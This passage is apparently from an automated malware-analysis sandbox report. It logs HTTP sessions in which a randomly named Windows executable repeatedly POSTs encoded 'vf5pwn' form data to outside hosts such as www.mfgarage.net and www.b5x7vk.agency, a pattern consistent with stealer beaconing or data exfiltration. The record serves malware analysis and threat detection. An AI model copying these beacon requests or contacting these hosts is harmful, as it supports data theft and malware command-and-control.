                                              Data Raw: 76 66 35 70 77 6e 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 74 6e 67 58 65 67 70 41 34 64 79 48 31 67 48 31 72 36 56 36 45 4a 50 55 67 71 51 71 34 6c 41 58 66 66 51 62 30 4e 45 54 69 59 53 52 51 79 48 31 34 69 4e 34 4a 70 45 49 78 4f 65 53 6f 75 51 59 6e 35 48 6e 4e 69 46 62 52 49 61 72 65 46 46 73 56 6e 67 4c 32 58 50 46 56 72 6e 47 59 43 51 7a 58 68 63 6b 56 32 77 35 66 46 35 65 4f 58 2b 2f 64 39 36 67 68 36 41 4a 4e 32 4d 68 44 6c 33 70 58 67 4f 76 54 58 70 79 58 2f 46 61 65 52 37 64 44 62 6c 63 64 47 62 30 34 6a 46 71 47 70 6a 6c 6d 6d 76 65 63 53 62 2f 53 54 46 74 58 5a 54 30 67 55 2b 6d 47 64 67 7a 33 32 45 3d
                                              Data Ascii: vf5pwn=qx+IcpUA9j0ptngXegpA4dyH1gH1r6V6EJPUgqQq4lAXffQb0NETiYSRQyH14iN4JpEIxOeSouQYn5HnNiFbRIareFFsVngL2XPFVrnGYCQzXhckV2w5fF5eOX+/d96gh6AJN2MhDl3pXgOvTXpyX/FaeR7dDblcdGb04jFqGpjlmmvecSb/STFtXZT0gU+mGdgz32E=
                                              Sep 26, 2024 15:24:46.626456976 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=4; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=NHg4BqL7wDHwBOu066f5609e; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=SAK8pcFeK0h0ZNnnTb4oj1KbqYU-kVZeJWadpNDPtZnk5Yfd-abH3vhqOyzh50WGBAU-dj8cOTAuHIXot8mkMw; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=6ycNnU58-QJSkYk1yuY0skxgM5-ErPYxJD9lyyF1Lw3XPtCbVQ70Zxk2siwKkZyIatPnGqGBHC_p-cRSPbdhsQ; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=GkGDpr9nQmiS0sQJx7yc2BWX0aqgg61q5QvyQK2U-JxnR61g4_WMwt16S31DmjRhrg_FkOIImOeU0HdZXpnkiGgZYn_oZkQsxAjdG1g9PT-F9FM5cWUSlLE_JnpzS7XTZRtXweClVL2Y7oXHUWcLh0cKuEGa3g4nzhuFCSXSAPStUexRpumW_EXDHrVQHu0p8fBDvGiryQa3Ox5svL9H8VopznG7VBWWIlYS1igtEogL4qybQJXeS-6S0XA1JRhnRRV0cbHRFA8OBZAzblR3xdLykpggxtoOytSZXyJKAOgGruVXfXUHxj7p6T6ZVJHP6KupuhpaE7-M
                                              Data Raw:
                                              Data Ascii:
                                              Sep 26, 2024 15:24:46.626894951 CEST404INData Raw: 73 34 34 77 51 4f 71 50 55 39 68 67 4e 69 32 61 32 6b 4e 30 6c 54 70 2d 78 36 4b 64 68 32 74 78 5f 58 55 65 39 65 42 6b 72 77 7a 41 6d 4d 56 6f 33 77 38 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70 69 72
                                              Data Ascii: s44wQOqPU9hgNi2a2kN0lTp-x6Kdh2tx_XUe9eBkrwzAmMVo3w8; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:46 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfga


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.54974185.153.138.113802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:48.466774940 CEST789OUTPOST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 55 58 66 2b 67 62 31 50 67 54 68 59 53 52 66 53 48 70 31 43 4e 7a 4a 70 59 41 78 4c 2b 53 6f 75 45 59 6e 38 6a 6e 4e 52 74 59 54 59 61 6c 54 6c 46 69 52 6e 67 4c 32 58 50 46 56 72 79 72 59 43 49 7a 58 77 73 6b 55 54 4d 36 57 6c 35 5a 47 33 2b 2f 5a 39 36 73 68 36 41 72 4e 33 67 50 44 6e 50 70 58 6b 4b 76 54 47 70 7a 64 2f 46 51 51 78 36 65 4b 5a 49 34 61 56 33 6a 38 7a 41 7a 56 61 58 35 75 77 43 30 47 77 54 58 42 7a 70 56 48 4b 62 44 78 6b 66 50 63 2b 77 44 70 68 51 36 56 57 4f 44 5a 4f 74 56 2b 64 71 4b 64 4e 71 69 47 79 68 6e
                                              Data Ascii: vf5pwn=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XUXf+gb1PgThYSRfSHp1CNzJpYAxL+SouEYn8jnNRtYTYalTlFiRngL2XPFVryrYCIzXwskUTM6Wl5ZG3+/Z96sh6ArN3gPDnPpXkKvTGpzd/FQQx6eKZI4aV3j8zAzVaX5uwC0GwTXBzpVHKbDxkfPc+wDphQ6VWODZOtV+dqKdNqiGyhn
                                              Sep 26, 2024 15:24:49.257050991 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=366; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=DkvsQmOvgvhnznmI66f560a1; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=pZTApRTrzbtQ9MxS-jIiKifC2OJ9dacAx8SBJKM1sN7_wNP_9dnN4CXiv18Fg4QbLW7ZBiyQibE2-H5S7Gjj1g; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=-pvdtGI6HGsFN4gyUDuIw6EhvXWyQMgVHEuKghVGqJjmZAkLUXIHxm_kp9cQAeT9-0-IY93KsdL66kVi9gLS1g; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=59OzB0Tlwb_G5hvaR_KZ01R8cW7VLWa-HixXLInE3_pjFka7KYa0Xd0zV89Ts8lbOrd_mgnnP4s6uO582nRgW-l0agUty6MyT80Pzrg87jhvkYHACUWh5nXDPXjKpAAdbHenJ6PGhdaZLYaeTC0IFZfAom5D2Dnb-6EN2XFW33-iKrAYdSDQw0X1SzQh0AfCtNjJCFZVEFT7NUY9Ev-hzgZ6H3IphiH8bZkplUxZxwsofFyVVWTqwzpL44at8bu-EU4czpyj9q-TnjGHyF0pbJojw-8axrlGLZn9FEFw24fJku9QUU9Rj4aOxiKLh4o2QXA_x_Wjck
                                              Data Raw:
                                              Data Ascii:
                                              Sep 26, 2024 15:24:49.258821964 CEST406INData Raw: 46 4d 69 58 72 6e 42 58 33 35 58 65 39 73 5a 62 6a 51 36 59 61 36 4b 67 54 57 43 66 49 56 7a 72 47 76 39 48 38 42 4f 6f 7a 56 4e 4d 4c 74 71 4c 42 31 53 64 33 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: FMiXrnBX35Xe9sZbjQ6Ya6KgTWCfIVzrGv9H8BOozVNMLtqLB1Sd3; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:49 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.54974285.153.138.113802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:51.057895899 CEST1806OUTPOST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 4d 58 66 73 34 62 31 76 63 54 67 59 53 52 57 79 48 71 31 43 4e 71 4a 70 51 45 78 4c 7a 76 6f 71 30 59 68 61 76 6e 4c 67 74 59 5a 59 61 6c 61 46 46 6a 56 6e 67 6b 32 57 2b 4e 56 72 69 72 59 43 49 7a 58 79 30 6b 64 6d 77 36 51 6c 35 65 4f 58 2b 4a 64 39 36 41 68 36 59 52 4e 33 55 78 57 44 7a 70 5a 67 75 76 65 51 39 7a 65 66 46 65 54 78 36 38 4b 5a 45 6e 61 56 72 5a 38 77 63 5a 56 61 2f 35 2b 58 48 31 46 51 54 76 44 44 70 71 56 61 33 46 74 77 50 53 62 2f 38 56 74 52 51 35 49 69 47 65 65 4a 4d 54 31 4a 37 7a 42 35 6d 50 4f 33 30 53 4c 43 6e 63 4b 62 50 31 58 46 69 68 50 33 2b 65 75 72 35 4c 67 68 50 46 50 72 6f 47 33 62 6f 49 53 37 32 34 38 37 44 32 6f 66 33 64 56 52 6a 37 49 64 35 5a 6f 4d 62 33 6d 4e 51 6f 7a 42 70 30 4d 41 64 2f 2f 51 72 52 53 47 34 73 63 5a 72 30 65 4a 54 74 4c 36 48 48 47 36 46 39 5a 38 2b 57 6c 63 4b 62 44 76 50 6a 36 45 30 58 6b 31 61 [TRUNCATED]
                                              Data Ascii: vf5pwn=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XMXfs4b1vcTgYSRWyHq1CNqJpQExLzvoq0YhavnLgtYZYalaFFjVngk2W+NVrirYCIzXy0kdmw6Ql5eOX+Jd96Ah6YRN3UxWDzpZguveQ9zefFeTx68KZEnaVrZ8wcZVa/5+XH1FQTvDDpqVa3FtwPSb/8VtRQ5IiGeeJMT1J7zB5mPO30SLCncKbP1XFihP3+eur5LghPFProG3boIS72487D2of3dVRj7Id5ZoMb3mNQozBp0MAd//QrRSG4scZr0eJTtL6HHG6F9Z8+WlcKbDvPj6E0Xk1aJqq23i4magDHQkuCO15qQloDycIfHT+hWEBa/F3kJJJaR0WPu0Fsvnf8tCFLQrPwYRciMXTSYo6+8ok+8EkaPod0KgNrQRuLE+fzEk+U8kKF/5aqFemJnHe7mbHsdEHLWoQy6LmPBVN+fs+9+lbiiAaHT7HkFehI/Ibq6CkTT+FI0WVsH39B47bB03/5A4NbnE/XpJjboiRkhglXlgaYHwQt1dBRKL8ommi1pqPuX6mGClYqaIdYxXipWbKQ81uwSGuMzChI865QtEem0XaCNn7v9ZZSrsXvfoiY9rEtT6b/BHYZOX41FgmoTWmYFj2TJppOgKSNm8HADstSwB9WjZKJdVDhWgqrbTNNHJmvgkgE0geZ+jiFafkK7M4wugg02GCjosYg+J6TJwb0uMIVCneEOER1PSCFSZACIVswiOCT8uRaBNiwzH0AM7IwtzLiF+g+KHWBgiXbd0oBYWqZjxbnOdElDT8C0jUI+N45cdAOnERMtEoOzVD/F3yVP1s7PA9zAxFi2qe6aVKjeYzKfhGHabKfWh5jV3XVTV6fTjewC5qqljcvGfNhw8iiLvqCJo+LNAvo76gUDyEx3J78YB6RqqAh0aXcHRfCtoI1A56x9OpSpAYGpuCTtPwLk50XxzcnFT75tCsACF0fBKYgfwrYrqjuZf+OVz [TRUNCATED]
                                              Sep 26, 2024 15:24:51.979511023 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=914; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=MWSV1rK07ApLeHVO66f560a3; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=rGiFgeWcMo7hdE21j7f5X4WgoUteT_D-AhHHu4QI42cq2HPEYjhWqpNCaw3jLycyHWDIZ0bDmpOj7XqZpqXQhg; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=eToZDYQHwifnpV-wtGHaBdm83Jl2RVu_wcOvQCz3W4viCW4UQ_9rSnqd-UTLBbUydvHoXSE6xEo57D6lmyBAfg; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:51 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=TeAlEEGGm51SKWXsoCvmtYHZj0UHqJ8VFFpcW9sWZLaC8SRj4kj8jkBD10aiqlJKLqbkz6p-4J8CgieUOe7CtJsyQAJjIsApX-zQmTL1-xm1aQTcoxaqZlxOj4fnOd1E4_nMHX5kpOxG2u-j-vpFHN7Op0zL0Mmf45oYGfflUTd4sXmTE--ciNg9y93dkXFV6ohHiCXv5XTmCYr4L63aFgQdE_8liL0lZMoJIzH1hDqJltY-DaUYNI5qt4ZiPKs9ArwuvXLp3eGND8czUPRpp_0C5jmgn6GqjSbuMV3zr0Yg4vI68GqUTVeCVR6wizDryjXSLWDed-
                                              Data Raw:
                                              Data Ascii:
                                              Sep 26, 2024 15:24:51.979636908 CEST407INData Raw: 45 64 69 4f 52 36 63 35 38 4e 58 4e 6a 78 68 57 61 46 47 6e 48 79 6c 4e 4f 45 63 31 57 46 52 34 42 4e 30 7a 44 74 6d 6c 58 65 46 46 57 33 61 7a 54 52 58 62 79 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: EdiOR6c58NXNjxhWaFGnHylNOEc1WFR4BN0zDtmlXeFFW3azTRXby; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:51 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.54974385.153.138.113802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:53.900444984 CEST523OUTGET /3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mfgarage.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:24:54.665582895 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=906; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=59akPmAiju8VRke566f560a6; Domain=.sahibinden.com; Expires=Sun, 26-Sep-2027 13:24:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=FP3wKNEC8_6UcTj_kLzrzmPhlH1kv2JQVy-_RBTNrE5mhqBDrBKC0x9wrkRmqKxiE3IKQ66VNUgn4TU0-O69PQ; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:54:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=1KvE0CsvVmc6T3KV_KWQlOGccDjoNjP8fgpBeI4UCTiGnRfuwFGmI0bwc_8T5NjwkWJrxeCSSrwGGoOIjPAW1g; Domain=.sahibinden.com; Expires=Fri, 26-Sep-2025 13:24:54 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=xCfm_eqbvUNNVgLiYquRyXgKWpzqAFoev_NQZjQgoPZlnUYj6sR98IItbPeZQ6k69PcyQxzKHxnDH-WDbQSPf-lR9WkpbgIY2I6yEtBOOe1QyNrsbsgvb5cbUI4gD21bSiCcwOvFMquTJgpOtlsGrXePzlGDSLLNmGlccI4mlb14vcQKko_GTf0c644Mvt2uLSWTNW-2WdRBdoy7L9JcvLt7AcAJ8MwU-J89RUGAO1cnZ6pzQ3vmbdKzXJo4d6jsWj2Q1KdrIaBYT-OzHCPdlCJwgynz_t3Y8tlJ7S3iSXJ80qhhB_92spxi7MdLZ31R7MRqQzXuJZ
                                              Data Raw:
                                              Data Ascii:
                                              Sep 26, 2024 15:24:54.666361094 CEST583INData Raw: 33 6e 4a 43 57 5a 5a 34 61 55 61 57 71 31 52 61 65 78 59 5a 75 4e 49 7a 70 6f 2d 32 46 32 7a 61 78 32 61 38 43 43 48 59 6d 7a 76 6d 69 6d 38 64 6a 71 56 7a 72 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: 3nJCWZZ4aUaWq1RaexYZuNIzpo-2F2zax2a8CCHYmzvmim8djqVzr; Domain=.sahibinden.com; Expires=Thu, 26-Sep-2024 13:39:54 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.549744172.67.165.25802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:59.838757038 CEST772OUTPOST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 6d 6c 34 53 35 37 43 2b 76 61 6b 7a 7a 52 77 7a 54 4f 35 6e 36 49 54 37 69 37 54 54 76 52 69 52 42 69 7a 36 79 5a 4f 44 66 38 45 4f 79 31 37 34 48 72 78 71 50 58 38 66 32 41 50 6e 72 2b 33 4d 4f 54 41 45 4b 71 32 71 55 32 32 45 30 6c 62 72 69 69 34 56 37 61 43 6f 4a 4e 38 47 37 51 71 57 5a 42 6c 58 36 68 53 4c 6a 67 56 34 54 35 58 65 69 57 4f 62 76 30 57 64 59 6f 67 59 36 52 52 62 30 6a 35 61 6b 36 53 75 4d 55 2b 38 53 34 49 64 32 53 6f 57 44 77 69 6a 39 59 38 6f 56 51 51 41 35 50 4c 37 36 42 43 41 44 6d 74 58 65 65 4b 32 50 34 51 50 43 76 75 68 46 30 59 3d
                                              Data Ascii: vf5pwn=aPX6cheLmOscml4S57C+vakzzRwzTO5n6IT7i7TTvRiRBiz6yZODf8EOy174HrxqPX8f2APnr+3MOTAEKq2qU22E0lbrii4V7aCoJN8G7QqWZBlX6hSLjgV4T5XeiWObv0WdYogY6RRb0j5ak6SuMU+8S4Id2SoWDwij9Y8oVQQA5PL76BCADmtXeeK2P4QPCvuhF0Y=
                                              Sep 26, 2024 15:25:00.941833973 CEST741INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:25:00 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWVRwH4o6es9cjRv9KQrITzRg2KDIR%2BsbB4vGKVMxFspfW7ZdvE1tyPEK1GgciZs0GZxZGO43cv1FKkEn6nYLYyMI%2F88tCw8sF%2Fn6r8xIkK2ldEGGmP7x%2BIDIGGfKPcqDmY30A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9393d46f097d0b-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                              Sep 26, 2024 15:25:00.941847086 CEST5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.549745172.67.165.25802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:25:02.910291910 CEST792OUTPOST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 32 52 42 48 50 36 78 62 6d 44 4d 4d 45 4f 35 56 36 7a 5a 62 77 6b 50 58 77 39 32 46 50 6e 72 2b 54 4d 4f 54 77 45 4a 5a 75 70 55 6d 32 38 2f 46 62 74 73 43 34 56 37 61 43 6f 4a 4e 6f 67 37 51 43 57 59 78 31 58 37 43 4b 49 67 67 56 37 53 35 58 65 6d 57 4f 66 76 30 57 2f 59 6f 52 51 36 55 64 62 30 6a 4a 61 6b 50 75 74 58 6b 2b 36 4e 6f 4a 43 78 78 64 50 61 78 36 65 35 5a 35 75 44 6a 73 31 38 35 6d 52 67 6a 4b 6f 51 47 42 76 4f 4e 43 42 65 49 78 6d 59 4d 2b 52 62 6a 4d 37 51 52 76 36 4b 4f 78 71 73 66 6f 2b 7a 55 31 67 66 71 72 46
                                              Data Ascii: vf5pwn=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvD2RBHP6xbmDMMEO5V6zZbwkPXw92FPnr+TMOTwEJZupUm28/FbtsC4V7aCoJNog7QCWYx1X7CKIggV7S5XemWOfv0W/YoRQ6Udb0jJakPutXk+6NoJCxxdPax6e5Z5uDjs185mRgjKoQGBvONCBeIxmYM+RbjM7QRv6KOxqsfo+zU1gfqrF
                                              Sep 26, 2024 15:25:03.908273935 CEST740INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:25:03 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crm9UGmSKpf08C3wAoPeM%2F09gSKvJtzPxskaWgjSa2cigzSTY8pZ4z9oDcb3zyg2wQLHivAoqsVBmHYZUVIse8y5cUKh9PoyxXvnmAeNWfweGgQwvpw290brO5ZfR3dZGZMHxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9393e7ad8a42eb-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              35192.168.2.549746172.67.165.2580
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:25:06.011473894 CEST1809OUTPOST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
